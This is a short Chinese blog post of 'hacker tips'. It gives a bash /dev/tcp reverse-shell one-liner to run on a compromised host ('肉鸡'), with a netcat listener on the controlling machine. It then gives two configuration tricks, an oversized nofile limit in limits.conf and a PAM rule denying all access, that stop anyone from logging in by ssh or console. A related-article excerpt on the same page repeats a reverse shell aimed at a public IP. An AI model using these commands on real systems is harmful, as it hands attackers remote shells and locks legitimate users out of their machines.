hacker tips

最新推荐文章于 2023-12-12 21:27:32 发布
最新推荐文章于 2023-12-12 21:27:32 发布
阅读量359 收藏
点赞数
分类专栏: hacker shell 杂七杂八 linux system
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/onlyellow/article/details/58595432
版权
linux system 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
shell
12 篇文章 0 订阅
订阅专栏
hacker
8 篇文章 0 订阅
订阅专栏

1. 反弹式shell

肉鸡:bash -i >& /dev/tcp/192.168.10.56/6666 0>&1

控制端: nc -v -l -p 6666


2. 登录限制

限制登录有多种方法。

1) hard limit大于nr_open,注销后无法正常登录

/etc/security/limits.conf 文件末尾加上如下:

*           soft    nofile          99999999

*           hard   nofile          99999999

数值大于/proc/sys/fs/nr_open即可

sysctl -p生效

然后谁也没法登录这台机器了(无论是ssh还是tty)


2) 利用pam限制登录

修改/etc/security/access.conf,  增加一行:

-:ALL : ALL

然后在/etc/pam.d/login 和 pam.d/sshd 增加

account    required     pam_access.so

即可生效(已经存在的session不受影响。新的session会受影响)

onlyellow
关注
专栏目录
google hacker语句
简介
02-22 1663
提示:以下是本篇文章正文内容,下面案例可供参考Google Dork,也称为Google Dorking或Google黑客攻击,是安全研究人员的宝贵资源。对于普通人来说,谷歌只是一个用于查找文本、图像、视频和新闻的搜索引擎。但是,在信息安全世界中,谷歌是一个有用的黑客工具。有人会如何使用谷歌来入侵网站?好吧,你不能直接使用谷歌入侵网站,但由于它具有巨大的网络爬行功能,它几乎可以索引你网站中的任何内容,包括敏感信息。
The Hacker Playbook 3
05-17
The hacker playbook第三版(包含mobi,azw3,epub与pdf格式), The Hacker Playbook 3 (THP3) takes your offensive game to the pro tier. With a combination of new strategies, attacks, exploits, tips and ...
Linux服务器中木马(肉鸡)手工清除方法
wuyongde0922的专栏
05-24 4941
0,简单判断有无木马 有无下列文件 cat /etc/rc.d/init.d/selinux cat /etc/rc.d/init.d/DbSecuritySpt ls /usr/bin/bsd-port  ls /usr/bin/dpkgd 查看大小是否正常 ls -lh /bin/netstat ls -lh /bin/ps ls -lh
2021-06-04web渗透中常见的bash反弹获取交互式窗口问题详解
qq_45290991的博客
06-05 259
bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求 公网主机: nc -lvvp 9090 肉鸡执行: bash -i &> /dev/tcp/144.34.164.217/9090 0>&1 其中144.34.164.217为自己的公网主机 12345 对命令的解释: bash -i意为创建一个交互式的bash shell &>意为将标准输出和标准错误都重定向到我们指定的文件中 12 实验如下: x@DES
Hacker基础之Linux篇:基础Linux命令七
Fly_鹏程万里
04-18 372
今天我们来了解一下几个Linux小命令,因为比较短的,而且不常用,所以会有三个(我就是这么任性)pastepaste命令用于合并文件的列paste指令会把每个文件以列对列的方式,一列列地加以合并paste命令使用介绍: 命令格式:paste [-s][-d <间隔字符>][--help][--version][文件名] 命令功能:合并文件的列 命令的常用参数选项说明: -d<间隔...
Interesting Hacker
dengyueyang的博客
02-12 286
1.“CHKDSK E:/F/X” (扫描E盘,可换盘) 2.“DISM/Online/Set-OSUninstallWindow /Value:30” (系统回滚时间设置,30可换) 3.“计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced”(regedit上面新建...
Vulnhub-Hacker kid: 1.0.1渗透
最新发布
laoyanCZ的博客
12-12 1073
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
HackerRank: Jumping on the Clouds
灰.灰的博客
06-13 528
题目链接:https://www.hackerrank.com/challenges/jumping-on-the-clouds/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=warmup tips:需要注意java.lang.ArrayInd...
The Hacker Mentality
不只是写代码的程序员
03-07 1264
The Hacker Mentality Let's get this straight - the original definition of a hacker is not someone who writes malicious code. A hacker is a creator, an innovator, and a builder. So what is the Hacke
Windows Tips
weixin_33935777的博客
11-19 89
1、查看和修改exe文件或dll文件的资源,可用eXeScope或Resource Hacker。 2、VC、unicode下,ofstream不能打开文件。可能原因是文件名(/含路径)要用宽字符。 3、写VC++程序,如果用到标准库(STL)的东西,可能会导致在不同版本的Windows上程序的运行不一致的问题。 walker在Windows Serve...
Hacker's Manual 2019
04-28
Featuring 172 pages of expert tips and advice from the makers of Linux Format magazine, Hacker’s Manual 2019 is the perfect guide for anyone looking to take their Linux skills to the next level....
The Hacker Playbook 3: Practical Guide To Penetration Testing
05-19
Back for the third season, The Hacker Playbook 3 (THP3) takes your offensive game to the pro tier. With a combination of new strategies, attacks, exploits, tips and tricks, you will be able to put ...
pid max导致fork: Cannot allocate memory 的分析及解决办法
热门推荐
onlyellow的博客
07-15 3万+
事情起因是有台生产环境的服务器down了,ssh连接不上去。就在大家准备去机房检查该机器的时候,突然又可以ssh登录了。但是只有一个同事成功登录,其他人依然无法连接。在成功登录的同事终端上执行任何命令,都会报如下错误: fork: Cannot allocate memory
centos7挂载ntfs格式移动硬盘/u盘
onlyellow的博客
04-27 1万+
centos7挂载ntfs格式移动硬盘
[k8s] kubelet 10250端口漏洞
onlyellow的博客
11-23 7689
最近服务器cpu又跑了100%, 卡的不行。一查发现是/tmp/docker 这个进程 Google一下,挖矿木马 蛋疼的一笔。物理服务器没有入侵痕迹,检查下进程是从容器内映射到物理服务器上的 然后检查容器,初步怀疑是容器登录账号泄露导致入侵。 杀掉挖矿进程后,修改容器登录密码,第二天依然被入侵。 继续Google,发现可能是kubelet 10250溢出漏洞导致任意代码远程执行。 链...
[LINUX] CentOS7下GRE通信配置
onlyellow的博客
12-26 6249
接了个跟移动对接的业务。需要搭建GRE访问移动内部网络。 找了台阿里云机器来模拟对接测试 Aliyun: ip tunnel add gre1 mode gre remote 218.*.*.*  local 172.19.*.* ttl 255   <===218*.*.*是APN-TEST的公网IP  172.*.*.*是阿里云主机内网IP ip link set gre1 up i...
[ffmpeg] 视频码率压缩
onlyellow的博客
11-02 4018
视频码率压缩 工作中遇到一个问题:播放原始视频时候,因为视频码率较大(2M左右),而现场网络带宽比较低,导致客户并发观看视频时候,会发生卡顿现象。因为客户升级网络计划需要一段时间,我们暂定降低视频码率来缓解卡顿问题 安装ffmpeg 安装ffmpeg仓库:yum localinstall --nogpgcheck https://download1.rpmfusion.org/free/el/rpmfusion-free-release-7.noarch.rpm 安装ffmpeg: yum install
修改docker loop设备
onlyellow的博客
12-08 3067
docker默认启动一个100g的loop设备用于存储image和container的运行空间。 生产环境必须修改,不能使用默认生成的loop设备:只有100g大小。而且受制于root所在目录空间(要是free space少于100g,则100g也用不到) 官方文档里面有修改办法: https://docs.docker.com/engine/userguide/storagedriver/
Resource Hacker 5.1.8:官方最新版功能解析
资源摘要信息:"Resource Hacker 5.1.8 是一款用于查看、修改、添加和删除Windows可执行文件资源的实用工具。资源是指储存在可执行文件(如exe、dll、scr等)中的图标、光标、菜单、对话框、位图、AVI视频、字符串、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值